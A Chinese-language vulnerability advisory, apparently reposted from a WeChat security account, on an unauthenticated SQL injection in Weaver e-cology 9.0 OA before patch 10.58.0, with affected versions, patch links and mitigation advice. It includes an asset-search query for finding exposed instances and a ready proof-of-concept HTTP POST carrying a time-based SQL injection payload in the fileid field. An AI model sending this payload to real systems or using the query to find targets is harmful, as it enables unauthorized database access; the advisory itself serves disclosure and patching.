泛微 e-cology 前台SQL注入漏洞

admin 2023年7月13日18:17:43评论29 views字数 626阅读2分5秒阅读模式

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

泛微协同管理应用平台(e-cology)是一套企业大型协同管理平台。10.58.0 及之前版本中,未经身份验证的攻击者可通过 sql 注入获取目标系统数据库中的任意数据,进而获取系统权限。

风险等级

影响版本

泛微 e-cology 9.0 OA 并且 补丁版本 < 10.58.0

资产确定

app.name="泛微 e-cology 9.0 OA"

漏洞验证

「POC」

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

fileid=1+WAITFOR+DELAY+%270:0:2%27&isFromOutImg=1
泛微 e-cology 前台SQL注入漏洞

修复建议

1、官方已发布补丁:https://www.weaver.com.cn/cs/securityDownload.asp 2、使用防护类设备对相关资产进行防护,但是存在绕过风险,请尽快前往官网下载安装升级补丁 3、如非必要,避免将资产暴露在互联网

后台回复0713获取poc项目地址

原文始发于微信公众号(CKCsec安全研究院):泛微 e-cology 前台SQL注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月13日18:17:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微 e-cology 前台SQL注入漏洞http://cn-sec.com/archives/1873402.html

发表评论

匿名网友 填写信息